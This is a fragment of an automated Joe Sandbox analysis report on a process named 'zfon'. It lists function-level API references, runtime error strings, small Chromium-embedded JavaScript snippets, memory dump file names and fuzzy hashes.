                                                                                                                                                                            • Instruction Fuzzy Hash: EB2105A5B0864781FB249F39D85027E6BD1AB48FE0F995035DE4D93790EE3CD9638B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: void$void
                                                                                                                                                                            • API String ID: 2943138195-3746155364
                                                                                                                                                                            • Opcode ID: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                                                                                            • Instruction ID: 1f252c6dde33f405a638691b2565b3b1ecb46b0ee0f7e8bf51d5288db470f05c
                                                                                                                                                                            • Opcode Fuzzy Hash: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B3139AAE18B5598FB00CFB4E8401FE37B0BB48748B551536EE4E62B59DF38A149CB50
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB2B8F
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB2BDA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: text/html
                                                                                                                                                                            • API String ID: 3856544966-3872744991
                                                                                                                                                                            • Opcode ID: 888e6c1b3f1e3331f613257842be11fd7939f225599eba024fbb2b563b5733c6
                                                                                                                                                                            • Instruction ID: 9411a4a95119efc210785f39d9f9acd1f338b44916251fa614834c4562892413
                                                                                                                                                                            • Opcode Fuzzy Hash: 888e6c1b3f1e3331f613257842be11fd7939f225599eba024fbb2b563b5733c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F317073608A4681EF20AF25E480129B332FBC5BA4F849231E6AD57BE9CF2CC546C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 3041573648-612978255
                                                                                                                                                                            • Opcode ID: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                                                                                            • Instruction ID: 98187721582c8da3d0841cf48fdbecec9aa8b124b9e36fb63bdd381d9e489106
                                                                                                                                                                            • Opcode Fuzzy Hash: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                                                                                            • Instruction Fuzzy Hash: DC213D62708A4281DF14DB29E590169A7B2FF48FD4B598436DB4D43769DF28D499C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Winerror_messagememcpymemmovememsetstd::_
                                                                                                                                                                            • String ID: unknown error
                                                                                                                                                                            • API String ID: 3480822978-3078798498
                                                                                                                                                                            • Opcode ID: 98119a2c876a1c59b561851f97c996c2cff6274175daffcd9d743103a7d01bdb
                                                                                                                                                                            • Instruction ID: 589a9f4853c271595c466ff6049acacc32e87cd9fe140847877d171daf69d0a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 98119a2c876a1c59b561851f97c996c2cff6274175daffcd9d743103a7d01bdb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5221D1BA62878681EB1C9F34D90927E2391EB95FC8F54A130DA2D173D9CF3CE0618B40
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF79CFB307B), ref: 00007FF79CFB327D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xout_of_range@std@@
                                                                                                                                                                            • String ID: invalid string position
                                                                                                                                                                            • API String ID: 1960685668-1799206989
                                                                                                                                                                            • Opcode ID: 39bc57a7c996044000b8f0ac340acb9529ebaab51d3efb8f16ee4a635c87aee7
                                                                                                                                                                            • Instruction ID: 88e25d3293de70e0979b4c443b852d51435ad4908824be5017f6fe3d977d08cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 39bc57a7c996044000b8f0ac340acb9529ebaab51d3efb8f16ee4a635c87aee7
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F21A162B18B8A82EF149F2EF5802686362FB18FC4FE84031CA5D07755DF3DE0998350
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEEC5
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEEFD
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}, xrefs: 00007FF79CFCEE6B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}
                                                                                                                                                                            • API String ID: 3856544966-1929393026
                                                                                                                                                                            • Opcode ID: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                                                                                            • Instruction ID: c63fcdbeff52211bb643716610d0bb0c35856fae26b8fc25133e0fca178d6bb1
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                                                                                            • Instruction Fuzzy Hash: 02218632708A4681EF20AB64E44036EA771FBC5BD4F989131EB9D07AA9DF3CC544C710
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEFB5
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEFED
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}, xrefs: 00007FF79CFCEF5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}
                                                                                                                                                                            • API String ID: 3856544966-2589232223
                                                                                                                                                                            • Opcode ID: c45757a5cfbc2a3afef824883f17d38b95613549d0e78bcdc3176d00afcd2908
                                                                                                                                                                            • Instruction ID: 153b1e3fdc55c43fe075add2018fae3e3f60f512d35c95197ea1feae348040c7
                                                                                                                                                                            • Opcode Fuzzy Hash: c45757a5cfbc2a3afef824883f17d38b95613549d0e78bcdc3176d00afcd2908
                                                                                                                                                                            • Instruction Fuzzy Hash: 22214472708A4281EF20AB24E45076AA771FB85BD4F989135EB9D47AA9DF3CC544C710
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B65920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B6592F
                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFBC1B3ACBC
                                                                                                                                                                            • _CxxThrowException.VCRUNTIME140 ref: 00007FFBC1B3ACCD
                                                                                                                                                                              • Part of subcall function 00007FFBC1B45E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DA0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B45E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DB2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B45E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45E3B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$ExceptionThrow_lock_localesstd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                            • API String ID: 1683849403-1405518554
                                                                                                                                                                            • Opcode ID: 7c9bcb853565743618b71d0b67f6afb15cda60452226c720ad76d4234984937c
                                                                                                                                                                            • Instruction ID: 5822953cbe75e45d855952433ec61185300441372e155b51887cb1ce34b5aff7
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c9bcb853565743618b71d0b67f6afb15cda60452226c720ad76d4234984937c
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C11C173605B8186C710DF34E84005A77B5FB58FA4B585239CBAC933AAEF34C951C780
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@
                                                                                                                                                                            • String ID: gfffffff$vector<T> too long
                                                                                                                                                                            • API String ID: 1004598685-118341189
                                                                                                                                                                            • Opcode ID: e0575076ecd3c4c86da7fa7fd0dbc3d6825d5a55bda48c19eddb97b109de987b
                                                                                                                                                                            • Instruction ID: e753b7536f03aa85d603f9463cc063350994085dd823c1f11f8a778e66668afb
                                                                                                                                                                            • Opcode Fuzzy Hash: e0575076ecd3c4c86da7fa7fd0dbc3d6825d5a55bda48c19eddb97b109de987b
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D01C4D2B1468E42ED18DBABFB188A48312A758BC0791A032DD0EEB794FC3CB141C203
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xout_of_range@std@@memmove
                                                                                                                                                                            • String ID: invalid string position
                                                                                                                                                                            • API String ID: 1894236298-1799206989
                                                                                                                                                                            • Opcode ID: dde0ee69190c90e305226251dbe193aa0800190eac452c817480dce08e476b2c
                                                                                                                                                                            • Instruction ID: 1056f0ff67f7323d880312dab8d8b969301714821e972678bf890f2239d0caae
                                                                                                                                                                            • Opcode Fuzzy Hash: dde0ee69190c90e305226251dbe193aa0800190eac452c817480dce08e476b2c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C11B162B18786C1DE249F3DE684028E372FB14FC8BA44431CA4D87765DF3DD5618360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                            • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                                            • API String ID: 3685223789-3176238549
                                                                                                                                                                            • Opcode ID: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                                                                                                            • Instruction ID: 8f6ae50673dde24b37eaff4cbb1535fbaf69050caa97e62f759b233e64a5e3e7
                                                                                                                                                                            • Opcode Fuzzy Hash: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                                                                                                            • Instruction Fuzzy Hash: AB015EE9A29A47A1EF00DF34E45137A6360FF84B44F517431E94E16669EFACE54ACF00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                            • Opcode ID: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                                                                                                            • Instruction ID: 3e0dd51bb879d8431f6a33a7f2d6867c450cf50b5c37addc96cc209781ebc270
                                                                                                                                                                            • Opcode Fuzzy Hash: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                                                                                                            • Instruction Fuzzy Hash: 77115E76608B4182EB648F25E40035BB7E4FB88B84F295230DE8D57768DF3CC552CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
